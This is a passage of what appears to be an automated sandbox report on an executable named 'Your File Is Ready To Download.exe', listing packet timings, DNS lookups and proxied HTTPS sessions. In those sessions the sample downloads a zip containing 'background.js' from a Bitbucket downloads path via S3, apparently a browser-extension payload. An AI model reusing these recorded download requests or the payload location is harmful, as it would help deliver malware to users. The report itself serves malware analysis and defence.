                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702543020 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702560902 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702579021 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702595949 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702613115 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702627897 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702646971 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702665091 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702725887 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702759981 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702778101 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702817917 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702835083 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702852964 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702869892 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702887058 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702903986 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702919960 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.702975988 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703006983 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703514099 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703535080 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703572989 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703592062 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703608990 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703625917 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703639984 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703658104 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703675032 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703691959 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703708887 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.703727007 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704675913 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704698086 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704703093 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704715014 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704744101 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704763889 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704781055 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704797983 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704814911 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704832077 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704884052 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704901934 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704919100 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704936028 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704953909 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704972029 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.704988956 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.705007076 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.705025911 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.705041885 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.705060005 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.705218077 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.705245018 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.705430031 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.705462933 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.705480099 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.705497980 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.705811977 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.705993891 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706015110 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706041098 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706051111 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706087112 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706104040 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706121922 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706139088 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706156969 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706495047 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706639051 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706682920 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706713915 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706760883 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706778049 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706794024 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706811905 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706829071 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706845045 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706872940 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706904888 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.706937075 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708009005 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708033085 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708050966 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708069086 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708087921 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708105087 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708121061 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708138943 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708156109 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708173990 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708189964 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708209991 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708226919 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708245039 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708261013 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.708277941 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709247112 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709269047 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709286928 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709304094 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709321022 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709340096 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709357023 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709369898 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709386110 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709403992 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709422112 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709439039 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709456921 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709491014 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709631920 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709646940 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709690094 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709707975 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709723949 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709742069 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709757090 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.709922075 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.710144997 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.710383892 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.710639000 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.710870028 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.711112022 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.711354971 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.720952988 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.745229006 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:09:13.551179886 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:09:13.575463057 CET44353617142.250.186.65192.168.2.3

                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                        Dec 6, 2021 19:08:32.669466019 CET192.168.2.38.8.8.80xbbf6Standard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.583690882 CET192.168.2.38.8.8.80x5018Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.778985023 CET192.168.2.38.8.8.80x1995Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.790374041 CET192.168.2.38.8.8.80xd135Standard query (0)clients2.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.794327021 CET192.168.2.38.8.8.80xb648Standard query (0)accounts.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.408777952 CET192.168.2.38.8.8.80x4a8aStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                        Dec 6, 2021 19:08:32.689768076 CET8.8.8.8192.168.2.30xbbf6No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.603542089 CET8.8.8.8192.168.2.30x5018No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.603542089 CET8.8.8.8192.168.2.30x5018No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.603542089 CET8.8.8.8192.168.2.30x5018No error (0)s3-w.us-east-1.amazonaws.com52.217.81.204A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.814053059 CET8.8.8.8192.168.2.30xb648No error (0)accounts.google.com142.250.185.109A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.819608927 CET8.8.8.8192.168.2.30x1995No error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.831160069 CET8.8.8.8192.168.2.30xd135No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.831160069 CET8.8.8.8192.168.2.30xd135No error (0)clients.l.google.com142.250.186.78A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.437242031 CET8.8.8.8192.168.2.30x4a8aNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.437242031 CET8.8.8.8192.168.2.30x4a8aNo error (0)googlehosted.l.googleusercontent.com142.250.186.65A (IP address)IN (0x0001)

                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                        • bitbucket.org
                                                                                                                                                                                                                        • bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                        • clients2.google.com
                                                                                                                                                                                                                        • accounts.google.com
                                                                                                                                                                                                                        • www.google.com
                                                                                                                                                                                                                        • clients2.googleusercontent.com

                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        0192.168.2.349711104.192.141.1443C:\Users\user\Desktop\Your File Is Ready To Download.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                        2021-12-06 18:08:33 UTC0OUTGET /betadevmode/devmode/downloads/block-floc.zip HTTP/1.1
                                                                                                                                                                                                                        User-Agent: AutoHotkey
                                                                                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        2021-12-06 18:08:33 UTC0INHTTP/1.1 302 Found
                                                                                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        X-Usage-Quota-Remaining: 999213.419
                                                                                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                                                                                        X-Usage-Request-Cost: 797.73
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        X-B3-TraceId: a5fcaf1ed03691d1
                                                                                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                                                                                        X-Dc-Location: Micros
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                        Date: Mon, 06 Dec 2021 18:08:33 GMT
                                                                                                                                                                                                                        X-Usage-User-Time: 0.018978
                                                                                                                                                                                                                        X-Usage-System-Time: 0.004954
                                                                                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/6ba4c15f-1d12-46cc-bdb7-164bb91831c3/downloads/c0187cad-0ad4-4a66-96dc-87848f4069e6/block-floc.zip?Signature=yNzbjFoBEb%2FlfvIrh1KoR48D0Kg%3D&Expires=1638815130&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=X.8ahGtam4Jkxg_sHKIwuqt9FSQEDbfR&response-content-disposition=attachment%3B%20filename%3D%22block-floc.zip%22
                                                                                                                                                                                                                        X-Served-By: b120c96c2b2f
                                                                                                                                                                                                                        Expires: Mon, 06 Dec 2021 18:08:33 GMT
                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                        X-Static-Version: e21921a9fa09
                                                                                                                                                                                                                        X-Render-Time: 0.0378558635712
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                                                                                        X-Request-Count: 2405
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-Version: e21921a9fa09
                                                                                                                                                                                                                        X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        1192.168.2.34971252.217.81.204443C:\Users\user\Desktop\Your File Is Ready To Download.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                        2021-12-06 18:08:34 UTC2OUTGET /6ba4c15f-1d12-46cc-bdb7-164bb91831c3/downloads/c0187cad-0ad4-4a66-96dc-87848f4069e6/block-floc.zip?Signature=yNzbjFoBEb%2FlfvIrh1KoR48D0Kg%3D&Expires=1638815130&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=X.8ahGtam4Jkxg_sHKIwuqt9FSQEDbfR&response-content-disposition=attachment%3B%20filename%3D%22block-floc.zip%22 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: AutoHotkey
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        2021-12-06 18:08:34 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                                                                        x-amz-id-2: wlPjnHds/AufNOhNm4jyKSdAJfwJhMr76dFmDrmRsY2pyGmyy27vyseDEyhEQZvT0D0NMphkYJg=
                                                                                                                                                                                                                        x-amz-request-id: MPRJH9MBY94HQXBC
                                                                                                                                                                                                                        Date: Mon, 06 Dec 2021 18:08:35 GMT
                                                                                                                                                                                                                        Last-Modified: Thu, 02 Dec 2021 22:35:33 GMT
                                                                                                                                                                                                                        ETag: "fe076363e3ff53fab0b4c0e58fc3cfe3"
                                                                                                                                                                                                                        x-amz-version-id: X.8ahGtam4Jkxg_sHKIwuqt9FSQEDbfR
                                                                                                                                                                                                                        Content-Disposition: attachment; filename="block-floc.zip"
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Content-Type: application/x-zip-compressed
                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                        Content-Length: 3071
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2021-12-06 18:08:34 UTC3INData Raw: 50 4b 03 04 14 00 00 00 08 00 20 7c 82 53 a6 da 03 25 fc 03 00 00 ac 0a 00 00 0d 00 1c 00 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 73 55 54 09 00 03 9b 49 a9 61 1f 4a a9 61 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 9d 56 df 6f e2 38 10 7e e7 af b0 f2 50 92 92 0d ed 9d 74 3a c1 71 d5 6d 85 74 3d 55 d7 15 1c fb 52 55 2b e3 4c 88 af c1 ce d9 0e 5d 84 f2 bf ef 38 bf 09 05 9d ca 03 60 67 66 fc cd cc 37 9f 13 65 82 19 2e 05 d9 80 59 50 11 ca ed 3f f2 15 84 eb 91 c3 80 e0 67 47 15 51 c5 fe 17 29 13 32 23 02 de c8 8a 0b f3 eb 1f 4a d1 bd fb f3 4f de b4 30 64 6a 9f 1a 19 34 61 be d2 24 03 ed b6 be 95 9d 0d 18 c3 77 8c 34 1c 96 3b 91 54 c4 b5 db 1c 37 6f a6 f8 f3 5b e7 c8 20 01 b1 31 f1 94 8c 46 bc 06 65 3f 36 c6 68 d6 31 7c e6 2f 81 91 4b a3 b8 d8 b8 b7 bf 54 c7 e5
                                                                                                                                                                                                                        Data Ascii: PK |S%background.jsUTIaJauxVo8~Pt:qmt=URU+L]8`gf7e.YP?gGQ)2#JO0dj4a$w4;T7o[ 1Fe?6h1|/KT
                                                                                                                                                                                                                        2021-12-06 18:08:34 UTC4INData Raw: 73 ea c5 7a 24 42 de bd 95 36 9c b0 8a 7f a7 e3 61 35 06 bd 45 cc 05 a2 dc df d6 ce e4 4f 33 48 5a 59 67 57 b4 f7 a3 dc 86 27 25 8c eb f2 f6 55 6c 3a 2f d6 bb e9 73 d2 ff 43 fd ce 3b 3e cc e8 3c b7 a4 e0 a3 20 c7 aa b8 45 0f ed 84 cc dc be dd b5 5e 54 78 31 60 67 e9 91 73 31 93 12 1e dd e7 33 9b 6a ac b6 2f 77 c3 b6 0d ef 2f f1 46 ed 35 dc 1f 9c 10 be c3 7b ae 96 65 ce 29 8d 55 8b 56 dc 79 f1 c5 39 6d e9 e9 97 9c 27 26 3d dc be 35 ea 72 ce da 65 0d 52 46 de 57 ca 27 71 56 ee 6f fd 3b 47 82 7f ca cf 25 13 92 b5 1a 15 3b 52 f6 b4 4f 0f 11 52 ed ae 94 89 f9 78 b0 a0 d0 d3 c0 e0 87 48 fc e3 64 c7 b5 e9 8e 36 3e 06 1a b3 7e 2c 39 d9 fe 48 46 bc ca d1 ef 54 f5 da 05 f6 22 1f 6f 8b 4a 32 e6 fd f3 75 d8 cf ba 7e 89 a5 c3 ad 86 95 4d 25 57 5d cf 48 b3 71 28 df bb
                                                                                                                                                                                                                        Data Ascii: sz$B6a5EO3HZYgW'%Ul:/sC;>< E^Tx1`gs13j/w/F5{e)UVy9m'&=5reRFW'qVo;G%;RORxHd6>~,9HFT"oJ2u~M%W]Hq(


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        2192.168.2.349716142.250.186.78443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC6OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                                                                                        Host: clients2.google.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        X-Goog-Update-Interactivity: fg
                                                                                                                                                                                                                        X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm
                                                                                                                                                                                                                        X-Goog-Update-Updater: chromecrx-85.0.4183.121
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC8INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-vxWdqWCGPbcYN7+i4/gAyA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Mon, 06 Dec 2021 18:08:52 GMT
                                                                                                                                                                                                                        Content-Type: text/xml; charset=UTF-8
                                                                                                                                                                                                                        X-Daynum: 5453
                                                                                                                                                                                                                        X-Daystart: 36532
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                        Server: GSE
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Transfer-Encoding: chunked
